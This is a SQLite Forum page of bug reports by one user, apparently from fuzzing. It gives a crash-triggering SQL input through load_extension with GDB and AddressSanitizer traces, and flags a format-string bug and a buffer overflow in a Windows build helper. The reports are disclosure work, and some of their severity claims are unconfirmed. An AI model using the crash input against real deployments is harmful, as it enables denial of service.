SQLite Forum

Timeline
Login

7 forum posts by user salmonx

2021-06-15
11:38 Edit: bug A stack buffer overflow vulnerability was discovered in SQLite 3.36.0 (artifact: d036c2b547 user: salmonx)

A stack buffer overflow vulnerability was discovered in SQLite 3.36.0.

toor@ubuntu:~/work/fuzz/sqlite$ cat crash1 
create table t1(one int);
insert into t1 values(load_extension(hex(hex(randomblob( hex(hex(hex(1))))))));
select  date( randomblob(one)) from t1;
toor@ubuntu:~/work/fuzz/sqlite$ ./sqlite3 < crash1
Segmentation fault (core dumped)  // tmp/core-61197-1623378831 

GDB Backtrace

toor@ubuntu:~/work/fuzz/sqlite$ gdb ./sqlite3 

Reading symbols from ./sqlite3...done.
(gdb) core-file /tmp/core-61197-1623378831 
[New LWP 61197]
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Core was generated by `./sqlite3'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  open_path (
    name=name@entry=0x7f4da662a018 "41343133434641324331453534303741314130393946434146344243393541423631303236433533354639353134414338334333393431354442393341353333344242373636423639433446314536343832463535343146304334394532424537353534"..., namelen=namelen@entry=133333325, mode=mode@entry=-1879047934, 
    sps=sps@entry=0x7f4dbdc16920 <rtld_search_dirs>, realname=realname@entry=0x7fff2ebf0790, 
    fbp=fbp@entry=0x7fff2ebf07a0, loader=0x7f4dbdc18170, whatcode=64, found_other_class=0x7fff2ebf078f)
    at dl-load.c:2034
2034	dl-load.c: No such file or directory.
(gdb) 
(gdb) bt
#0  open_path (
    name=name@entry=0x7f4da662a018 "41343133434641324331453534303741314130393946434146344243393541423631303236433533354639353134414338334333393431354442393341353333344242373636423639433446314536343832463535343146304334394532424537353534"..., namelen=namelen@entry=133333325, mode=mode@entry=-1879047934, 
    sps=sps@entry=0x7f4dbdc16920 <rtld_search_dirs>, realname=realname@entry=0x7fff2ebf0790, 
    fbp=fbp@entry=0x7fff2ebf07a0, loader=0x7f4dbdc18170, whatcode=64, found_other_class=0x7fff2ebf078f)
    at dl-load.c:2034
#1  0x00007f4dbd9f660f in _dl_map_object (loader=loader@entry=0x7f4dbdc18170, 
    name=name@entry=0x7f4da662a018 "41343133434641324331453534303741314130393946434146344243393541423631303236433533354639353134414338334333393431354442393341353333344242373636423639433446314536343832463535343146304334394532424537353534"..., type=type@entry=2, trace_mode=trace_mode@entry=0, mode=mode@entry=-1879047934, nsid=<optimized out>)
    at dl-load.c:2381
#2  0x00007f4dbda02084 in dl_open_worker (a=a@entry=0x7fff2ebf0d10) at dl-open.c:235
#3  0x00007f4dbcd851ef in __GI__dl_catch_exception (exception=exception@entry=0x7fff2ebf0cf0, 
    operate=operate@entry=0x7f4dbda01f60 <dl_open_worker>, args=args@entry=0x7fff2ebf0d10)
    at dl-error-skeleton.c:196
#4  0x00007f4dbda0196a in _dl_open (
    file=0x7f4da662a018 "41343133434641324331453534303741314130393946434146344243393541423631303236433533354639353134414338334333393431354442393341353333344242373636423639433446314536343832463535343146304334394532424537353534"..., mode=-2147483390, caller_dlopen=0x5593264fe1f4 <sqlite3_load_extension+628>, nsid=<optimized out>, argc=1, 
    argv=<optimized out>, env=0x7fff2ebf29c8) at dl-open.c:605
#5  0x00007f4dbd22ef96 in dlopen_doit (a=a@entry=0x7fff2ebf0f40) at dlopen.c:66
#6  0x00007f4dbcd851ef in __GI__dl_catch_exception (exception=exception@entry=0x7fff2ebf0ee0, 
    operate=operate@entry=0x7f4dbd22ef40 <dlopen_doit>, args=args@entry=0x7fff2ebf0f40) at dl-error-skeleton.c:196
#7  0x00007f4dbcd8527f in __GI__dl_catch_error (objname=objname@entry=0x55932787a8b0, 
    errstring=errstring@entry=0x55932787a8b8, mallocedp=mallocedp@entry=0x55932787a8a8, 
    operate=operate@entry=0x7f4dbd22ef40 <dlopen_doit>, args=args@entry=0x7fff2ebf0f40) at dl-error-skeleton.c:215
#8  0x00007f4dbd22f745 in _dlerror_run (operate=operate@entry=0x7f4dbd22ef40 <dlopen_doit>, 
    args=args@entry=0x7fff2ebf0f40) at dlerror.c:162
#9  0x00007f4dbd22f051 in __dlopen (file=<optimized out>, mode=<optimized out>) at dlopen.c:87
#10 0x00005593264fe1f4 in sqlite3OsDlOpen (
    zPath=0x7f4da662a018 "41343133434641324331453534303741314130393946434146344243393541423631303236433533354639353134414338334333393431354442393341353333344242373636423639433446314536343832463535343146304334394532424537353534"..., pVfs=0x559326a4e3c0 <aVfs.18009>) at sqlite3.c:23652
#11 sqlite3LoadExtension (pzErrMsg=0x7fff2ebf0ff0, zProc=0x0, 
    zFile=0x7f4da662a018 "41343133434641324331453534303741314130393946434146344243393541423631303236433533354639353134414338334333393431354442393341353333344242373636423639433446314536343832463535343146304334394532424537353534"..., db=0x559327866c88) at sqlite3.c:61882
#12 sqlite3_load_extension (db=db@entry=0x559327866c88, 
    zFile=zFile@entry=0x7f4da662a018 "41343133434641324331453534303741314130393946434146344243393541423631303236433---Type <return> t---Type <return> to continue, or q <return> to quit---
533354639353134414338334333393431354442393341353333344242373636423639433446314536343832463535343146304334394532424537353534"..., 
    zProc=0x0, pzErrMsg=pzErrMsg@entry=0x7fff2ebf0ff0) at sqlite3.c:61984
#13 0x000055932650013a in loadExt (context=0x559327876748, argc=1, argv=0x559327876778) at sqlite3.c:120743
#14 0x000055932661fd2d in sqlite3VdbeExec (p=p@entry=0x5593278742e8) at sqlite3.c:94427
#15 0x0000559326646b81 in sqlite3Step (p=0x5593278742e8) at sqlite3.c:84821
#16 sqlite3_step (pStmt=<optimized out>) at sqlite3.c:19342
#17 0x000055932627161d in exec_prepared_stmt (pStmt=0x5593278742e8, pArg=0x7fff2ebf16a0) at shell.c:14156
#18 shell_exec (pArg=0x7fff2ebf16a0, zSql=<optimized out>, pzErrMsg=0x7fff2ebf14a8) at shell.c:14465
#19 0x0000559326278b48 in runOneSqlLine (p=0x7fff2ebf16a0, 
    zSql=0x559327866bf0 "insert into t1 values(load_extension(hex(hex(randomblob( hex(hex(hex(1))))))));", 
    in=0x7f4dbd009a00 <_IO_2_1_stdin_>, startline=2) at shell.c:21411
#20 0x00005593262a75a7 in process_input (p=0x7fff2ebf16a0) at shell.c:21511
#21 0x00005593261d4b2e in main (argc=<optimized out>, argv=<optimized out>) at shell.c:22320

AddressSanitizer: stack-overflow

toor@ubuntu:~/work/fuzz/poc/sqlite-snapshot-202106031851$ ./sqlite3 
SQLite version 3.36.0 2021-06-03 18:51:51
Enter ".help" for usage hints.
Connected to a transient in-memory database.
Use ".open FILENAME" to reopen on a persistent database.
sqlite> insert into t1 values(load_extension(hex(hex(randomblob( hex(hex(hex(1))))))));
Error: no such table: t1
sqlite> create table t1(one int);
insert into t1 values(load_extension(hex(hex(randomblob( hex(hex(hex(1))))))));sqlite> 
AddressSanitizer:DEADLYSIGNAL
=================================================================
==56360==ERROR: AddressSanitizer: stack-overflow on address 0x7ffdd1242fb8 (pc 0x7f8104b932f6 bp 0x7ffdd916b290 sp 0x7ffdd1242fc0 T0)
    #0 0x7f8104b932f5  (/lib64/ld-linux-x86-64.so.2+0x62f5)
    #1 0x7f8104b9660e  (/lib64/ld-linux-x86-64.so.2+0x960e)
    #2 0x7f8104ba2083  (/lib64/ld-linux-x86-64.so.2+0x15083)
    #3 0x7f8103b051ee in _dl_catch_exception /build/glibc-S9d2JN/glibc-2.27/elf/dl-error-skeleton.c:196
    #4 0x7f8104ba1969  (/lib64/ld-linux-x86-64.so.2+0x14969)
    #5 0x7f81043cef95 in dlopen_doit /build/glibc-S9d2JN/glibc-2.27/dlfcn/dlopen.c:66
    #6 0x7f8103b051ee in _dl_catch_exception /build/glibc-S9d2JN/glibc-2.27/elf/dl-error-skeleton.c:196
    #7 0x7f8103b0527e in _dl_catch_error /build/glibc-S9d2JN/glibc-2.27/elf/dl-error-skeleton.c:215
    #8 0x7f81043cf744 in _dlerror_run /build/glibc-S9d2JN/glibc-2.27/dlfcn/dlerror.c:162
    #9 0x7f81043cf050 in dlopen /build/glibc-S9d2JN/glibc-2.27/dlfcn/dlopen.c:87
    #10 0x46c0b1 in dlopen /local/mnt/workspace/bcain_clang_bcain-ubuntu_23113/llvm/utils/release/final/llvm.src/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:6033:15
    #11 0x5b2b41 in sqlite3OsDlOpen /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/sqlite3.c:23652:10
    #12 0x5b2b41 in sqlite3LoadExtension /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/sqlite3.c:127418:12
    #13 0x5b2b41 in sqlite3_load_extension /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/sqlite3.c:127520:8
    #14 0x9a157b in loadExt /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/sqlite3.c:120743:16
    #15 0x66f9b9 in sqlite3VdbeExec /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/sqlite3.c:94427:3
    #16 0x5763c4 in sqlite3Step /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/sqlite3.c:84821:10
    #17 0x5763c4 in sqlite3_step /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/sqlite3.c:84878:16
    #18 0x5545b4 in exec_prepared_stmt /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/shell.c:14156:8
    #19 0x5087dc in shell_exec /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/shell.c:14465:7
    #20 0x559732 in runOneSqlLine /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/shell.c:21411:8
    #21 0x50dc6c in process_input /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/shell.c:21511:17
    #22 0x4e082e in main /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/shell.c:22312:12
    #23 0x7f81039bfbf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
    #24 0x41c049 in _start (/home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/sqlite3+0x41c049)

SUMMARY: AddressSanitizer: stack-overflow (/lib64/ld-linux-x86-64.so.2+0x62f5) 
==56360==ABORTING
11:34 Reply: A stack overflow vulnerability in SQLite nmakehelp.c allows arbitrary code execution via a crated file (artifact: 64e9895d18 user: salmonx)

Thanks for your timely response. But you could delete the vulnerable code or fix it to make SQLite more secure, don't you think so? :)

11:30 Edit: A format string vulnerability in tool used to help build SQLite's TCL extension on Windows (artifact: 7f0beca979 user: salmonx)

The 'printf' in SubstituteFile accepts a format string as an argument, but the format string originates from the argv[3] which is controlled by user.

static int
SubstituteFile(
    const char *substitutions,
    const char *filename)
{
    ...

    fp = fopen(filename, "rt");
    if (fp != NULL) {
    	
    	while (fgets(szBuffer, cbBuffer, fp) != NULL) {
    	    list_item_t *p = NULL;
    	    for (p = substPtr; p != NULL; p = p->nextPtr) {
    		char *m = strstr(szBuffer, p->key);
    		if (m) {
    		    char *cp, *op, *sp;
    		    cp = szCopy;
    		    op = szBuffer;
    		    while (op != m) *cp++ = *op++;
    		    sp = p->value;
    		    while (sp && *sp) *cp++ = *sp++;
    		    op += strlen(p->key);
    		    while (*op) *cp++ = *op++;
    		    *cp = 0;
    		    memcpy(szBuffer, szCopy, sizeof(szCopy));
    		}
    	    }
    	    printf(szBuffer); // Vulnerability
    	}
    	
    	list_free(&substPtr);
    }
    fclose(fp);
    return 0;
}
07:18 Post: A stack overflow vulnerability in SQLite nmakehelp.c allows arbitrary code execution via a crated file (artifact: 4a3625e733 user: salmonx)

The local variable 'szBuffer' in GetVersionFromFile can be exploited by a local attacker for arbitrary code execution.

static const char *
GetVersionFromFile(
    const char *filename,
    const char *match)
{
    size_t cbBuffer = 100;
    static char szBuffer[100];
    char *szResult = NULL;
    FILE *fp = fopen(filename, "rt");

    if (fp != NULL) {
	/*
	 * Read data until we see our match string.
	 */

	while (fgets(szBuffer, cbBuffer, fp) != NULL) {
	    LPSTR p, q;

	    p = strstr(szBuffer, match);
	    if (p != NULL) {
		/*
		 * Skip to first digit.
		 */

		while (*p && !isdigit(*p)) {
		    ++p;
		}

		/*
		 * Find ending whitespace.
		 */

		q = p;
		while (*q && (isalnum(*q) || *q == '.')) {
		    ++q;
		}

		memcpy(szBuffer, p, q - p); // Vulnerability
		szBuffer[q-p] = 0;
		szResult = szBuffer;
		break;
	    }
	}
	fclose(fp);
    }
    return szResult;
}
07:04 Post: A format string vulnerability in tool used to help build SQLite's TCL extension on Windows (artifact: 7dcd751996 user: salmonx)

The 'printf' in SubstituteFile accepts a format string as an argument, but the format string originates from the argv[3] which is controlled by user.

static int
SubstituteFile(
    const char *substitutions,
    const char *filename)
{
    ...

    fp = fopen(filename, "rt");
    if (fp != NULL) {
    	
    	while (fgets(szBuffer, cbBuffer, fp) != NULL) {
    	    list_item_t *p = NULL;
    	    for (p = substPtr; p != NULL; p = p->nextPtr) {
    		char *m = strstr(szBuffer, p->key);
    		if (m) {
    		    char *cp, *op, *sp;
    		    cp = szCopy;
    		    op = szBuffer;
    		    while (op != m) *cp++ = *op++;
    		    sp = p->value;
    		    while (sp && *sp) *cp++ = *sp++;
    		    op += strlen(p->key);
    		    while (*op) *cp++ = *op++;
    		    *cp = 0;
    		    memcpy(szBuffer, szCopy, sizeof(szCopy));
    		}
    	    }
    	    printf(szBuffer); // Vulnerability
    	}
    	
    	list_free(&substPtr);
    }
    fclose(fp);
    return 0;
}
04:00 Post: Bug A NULL pointer dereference bug was discovered in SQLite (artifact: 48d46020bb user: salmonx)

NULL Pointer (sqlite3_vfs_find)

SQLITE_API sqlite3_vfs *sqlite3_vfs_find(const char *zVfs){
  ...
#ifndef SQLITE_OMIT_AUTOINIT
  int rc = sqlite3_initialize();
  if( rc ) return 0;            // NULL Pointer
#endif
  ...
  return pVfs;
}

NULL Pointer Deference

sqlite3MemdbInit

SQLITE_PRIVATE int sqlite3MemdbInit(void){
  sqlite3_vfs *pLower = sqlite3_vfs_find(0);
  unsigned int sz = pLower->szOsFile; // NULL Pointer Deference
  ...
}

sqlite3_appendvfs_init

int sqlite3_appendvfs_init(
  sqlite3 *db, 
  char **pzErrMsg, 
  const sqlite3_api_routines *pApi
){
  ...
  pOrig = sqlite3_vfs_find(0);
  apnd_vfs.iVersion = pOrig->iVersion; // NULL Pointer Deference
  apnd_vfs.pAppData = pOrig;
  apnd_vfs.szOsFile = pOrig->szOsFile + sizeof(ApndFile); //NULL Pointer Deference
  ...
}

timeOfDay

/* Return the current wall-clock time */
static sqlite3_int64 timeOfDay(void){
  static sqlite3_vfs *clockVfs = 0;
  sqlite3_int64 t;
  if( clockVfs==0 ) clockVfs = sqlite3_vfs_find(0);
  if( clockVfs->iVersion>=2 && clockVfs->xCurrentTimeInt64!=0 ){ // NULL Pointer Deference
    clockVfs->xCurrentTimeInt64(clockVfs, &t);
  }else{
    double r;
    clockVfs->xCurrentTime(clockVfs, &r); // NULL Pointer Deference
    t = (sqlite3_int64)(r*86400000.0);
  }
  return t;
}
2021-06-11
03:37 Post: bug A stack buffer overflow vulnerability was discovered in SQLite 3.36.0 (artifact: 08a0d6d9bf user: salmonx)

A stack buffer overflow vulnerability was discovered in SQLite 3.36.0.

toor@ubuntu:~/work/fuzz/sqlite$ cat crash1 
create table t1(one int);
insert into t1 values(load_extension(hex(hex(randomblob( hex(hex(hex(1))))))));
select  date( randomblob(one)) from t1;
toor@ubuntu:~/work/fuzz/sqlite$ ./sqlite3 < crash1
Segmentation fault (core dumped)  // tmp/core-61197-1623378831 

GDB Backtrace

toor@ubuntu:~/work/fuzz/sqlite$ gdb ./sqlite3 

Reading symbols from ./sqlite3...done.
(gdb) core-file /tmp/core-61197-1623378831 
[New LWP 61197]
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Core was generated by `./sqlite3'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  open_path (
    name=name@entry=0x7f4da662a018 "41343133434641324331453534303741314130393946434146344243393541423631303236433533354639353134414338334333393431354442393341353333344242373636423639433446314536343832463535343146304334394532424537353534"..., namelen=namelen@entry=133333325, mode=mode@entry=-1879047934, 
    sps=sps@entry=0x7f4dbdc16920 <rtld_search_dirs>, realname=realname@entry=0x7fff2ebf0790, 
    fbp=fbp@entry=0x7fff2ebf07a0, loader=0x7f4dbdc18170, whatcode=64, found_other_class=0x7fff2ebf078f)
    at dl-load.c:2034
2034	dl-load.c: No such file or directory.
(gdb) 
(gdb) bt
#0  open_path (
    name=name@entry=0x7f4da662a018 "41343133434641324331453534303741314130393946434146344243393541423631303236433533354639353134414338334333393431354442393341353333344242373636423639433446314536343832463535343146304334394532424537353534"..., namelen=namelen@entry=133333325, mode=mode@entry=-1879047934, 
    sps=sps@entry=0x7f4dbdc16920 <rtld_search_dirs>, realname=realname@entry=0x7fff2ebf0790, 
    fbp=fbp@entry=0x7fff2ebf07a0, loader=0x7f4dbdc18170, whatcode=64, found_other_class=0x7fff2ebf078f)
    at dl-load.c:2034
#1  0x00007f4dbd9f660f in _dl_map_object (loader=loader@entry=0x7f4dbdc18170, 
    name=name@entry=0x7f4da662a018 "41343133434641324331453534303741314130393946434146344243393541423631303236433533354639353134414338334333393431354442393341353333344242373636423639433446314536343832463535343146304334394532424537353534"..., type=type@entry=2, trace_mode=trace_mode@entry=0, mode=mode@entry=-1879047934, nsid=<optimized out>)
    at dl-load.c:2381
#2  0x00007f4dbda02084 in dl_open_worker (a=a@entry=0x7fff2ebf0d10) at dl-open.c:235
#3  0x00007f4dbcd851ef in __GI__dl_catch_exception (exception=exception@entry=0x7fff2ebf0cf0, 
    operate=operate@entry=0x7f4dbda01f60 <dl_open_worker>, args=args@entry=0x7fff2ebf0d10)
    at dl-error-skeleton.c:196
#4  0x00007f4dbda0196a in _dl_open (
    file=0x7f4da662a018 "41343133434641324331453534303741314130393946434146344243393541423631303236433533354639353134414338334333393431354442393341353333344242373636423639433446314536343832463535343146304334394532424537353534"..., mode=-2147483390, caller_dlopen=0x5593264fe1f4 <sqlite3_load_extension+628>, nsid=<optimized out>, argc=1, 
    argv=<optimized out>, env=0x7fff2ebf29c8) at dl-open.c:605
#5  0x00007f4dbd22ef96 in dlopen_doit (a=a@entry=0x7fff2ebf0f40) at dlopen.c:66
#6  0x00007f4dbcd851ef in __GI__dl_catch_exception (exception=exception@entry=0x7fff2ebf0ee0, 
    operate=operate@entry=0x7f4dbd22ef40 <dlopen_doit>, args=args@entry=0x7fff2ebf0f40) at dl-error-skeleton.c:196
#7  0x00007f4dbcd8527f in __GI__dl_catch_error (objname=objname@entry=0x55932787a8b0, 
    errstring=errstring@entry=0x55932787a8b8, mallocedp=mallocedp@entry=0x55932787a8a8, 
    operate=operate@entry=0x7f4dbd22ef40 <dlopen_doit>, args=args@entry=0x7fff2ebf0f40) at dl-error-skeleton.c:215
#8  0x00007f4dbd22f745 in _dlerror_run (operate=operate@entry=0x7f4dbd22ef40 <dlopen_doit>, 
    args=args@entry=0x7fff2ebf0f40) at dlerror.c:162
#9  0x00007f4dbd22f051 in __dlopen (file=<optimized out>, mode=<optimized out>) at dlopen.c:87
#10 0x00005593264fe1f4 in sqlite3OsDlOpen (
    zPath=0x7f4da662a018 "41343133434641324331453534303741314130393946434146344243393541423631303236433533354639353134414338334333393431354442393341353333344242373636423639433446314536343832463535343146304334394532424537353534"..., pVfs=0x559326a4e3c0 <aVfs.18009>) at sqlite3.c:23652
#11 sqlite3LoadExtension (pzErrMsg=0x7fff2ebf0ff0, zProc=0x0, 
    zFile=0x7f4da662a018 "41343133434641324331453534303741314130393946434146344243393541423631303236433533354639353134414338334333393431354442393341353333344242373636423639433446314536343832463535343146304334394532424537353534"..., db=0x559327866c88) at sqlite3.c:61882
#12 sqlite3_load_extension (db=db@entry=0x559327866c88, 
    zFile=zFile@entry=0x7f4da662a018 "41343133434641324331453534303741314130393946434146344243393541423631303236433---Type <return> t---Type <return> to continue, or q <return> to quit---
533354639353134414338334333393431354442393341353333344242373636423639433446314536343832463535343146304334394532424537353534"..., 
    zProc=0x0, pzErrMsg=pzErrMsg@entry=0x7fff2ebf0ff0) at sqlite3.c:61984
#13 0x000055932650013a in loadExt (context=0x559327876748, argc=1, argv=0x559327876778) at sqlite3.c:120743
#14 0x000055932661fd2d in sqlite3VdbeExec (p=p@entry=0x5593278742e8) at sqlite3.c:94427
#15 0x0000559326646b81 in sqlite3Step (p=0x5593278742e8) at sqlite3.c:84821
#16 sqlite3_step (pStmt=<optimized out>) at sqlite3.c:19342
#17 0x000055932627161d in exec_prepared_stmt (pStmt=0x5593278742e8, pArg=0x7fff2ebf16a0) at shell.c:14156
#18 shell_exec (pArg=0x7fff2ebf16a0, zSql=<optimized out>, pzErrMsg=0x7fff2ebf14a8) at shell.c:14465
#19 0x0000559326278b48 in runOneSqlLine (p=0x7fff2ebf16a0, 
    zSql=0x559327866bf0 "insert into t1 values(load_extension(hex(hex(randomblob( hex(hex(hex(1))))))));", 
    in=0x7f4dbd009a00 <_IO_2_1_stdin_>, startline=2) at shell.c:21411
#20 0x00005593262a75a7 in process_input (p=0x7fff2ebf16a0) at shell.c:21511
#21 0x00005593261d4b2e in main (argc=<optimized out>, argv=<optimized out>) at shell.c:22320

AddressSanitizer: stack-overflow

toor@ubuntu:~/work/fuzz/poc/sqlite-snapshot-202106031851$ ./sqlite3 
SQLite version 3.36.0 2021-06-03 18:51:51
Enter ".help" for usage hints.
Connected to a transient in-memory database.
Use ".open FILENAME" to reopen on a persistent database.
sqlite> insert into t1 values(load_extension(hex(hex(randomblob( hex(hex(hex(1))))))));
Error: no such table: t1
sqlite> create table t1(one int);
insert into t1 values(load_extension(hex(hex(randomblob( hex(hex(hex(1))))))));sqlite> 
AddressSanitizer:DEADLYSIGNAL
=================================================================
==56360==ERROR: AddressSanitizer: stack-overflow on address 0x7ffdd1242fb8 (pc 0x7f8104b932f6 bp 0x7ffdd916b290 sp 0x7ffdd1242fc0 T0)
    #0 0x7f8104b932f5  (/lib64/ld-linux-x86-64.so.2+0x62f5)
    #1 0x7f8104b9660e  (/lib64/ld-linux-x86-64.so.2+0x960e)
    #2 0x7f8104ba2083  (/lib64/ld-linux-x86-64.so.2+0x15083)
    #3 0x7f8103b051ee in _dl_catch_exception /build/glibc-S9d2JN/glibc-2.27/elf/dl-error-skeleton.c:196
    #4 0x7f8104ba1969  (/lib64/ld-linux-x86-64.so.2+0x14969)
    #5 0x7f81043cef95 in dlopen_doit /build/glibc-S9d2JN/glibc-2.27/dlfcn/dlopen.c:66
    #6 0x7f8103b051ee in _dl_catch_exception /build/glibc-S9d2JN/glibc-2.27/elf/dl-error-skeleton.c:196
    #7 0x7f8103b0527e in _dl_catch_error /build/glibc-S9d2JN/glibc-2.27/elf/dl-error-skeleton.c:215
    #8 0x7f81043cf744 in _dlerror_run /build/glibc-S9d2JN/glibc-2.27/dlfcn/dlerror.c:162
    #9 0x7f81043cf050 in dlopen /build/glibc-S9d2JN/glibc-2.27/dlfcn/dlopen.c:87
    #10 0x46c0b1 in dlopen /local/mnt/workspace/bcain_clang_bcain-ubuntu_23113/llvm/utils/release/final/llvm.src/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:6033:15
    #11 0x5b2b41 in sqlite3OsDlOpen /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/sqlite3.c:23652:10
    #12 0x5b2b41 in sqlite3LoadExtension /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/sqlite3.c:127418:12
    #13 0x5b2b41 in sqlite3_load_extension /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/sqlite3.c:127520:8
    #14 0x9a157b in loadExt /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/sqlite3.c:120743:16
    #15 0x66f9b9 in sqlite3VdbeExec /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/sqlite3.c:94427:3
    #16 0x5763c4 in sqlite3Step /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/sqlite3.c:84821:10
    #17 0x5763c4 in sqlite3_step /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/sqlite3.c:84878:16
    #18 0x5545b4 in exec_prepared_stmt /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/shell.c:14156:8
    #19 0x5087dc in shell_exec /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/shell.c:14465:7
    #20 0x559732 in runOneSqlLine /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/shell.c:21411:8
    #21 0x50dc6c in process_input /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/shell.c:21511:17
    #22 0x4e082e in main /home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/shell.c:22312:12
    #23 0x7f81039bfbf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
    #24 0x41c049 in _start (/home/toor/work/fuzz/poc/sqlite-snapshot-202106031851/sqlite3+0x41c049)

SUMMARY: AddressSanitizer: stack-overflow (/lib64/ld-linux-x86-64.so.2+0x62f5) 
==56360==ABORTING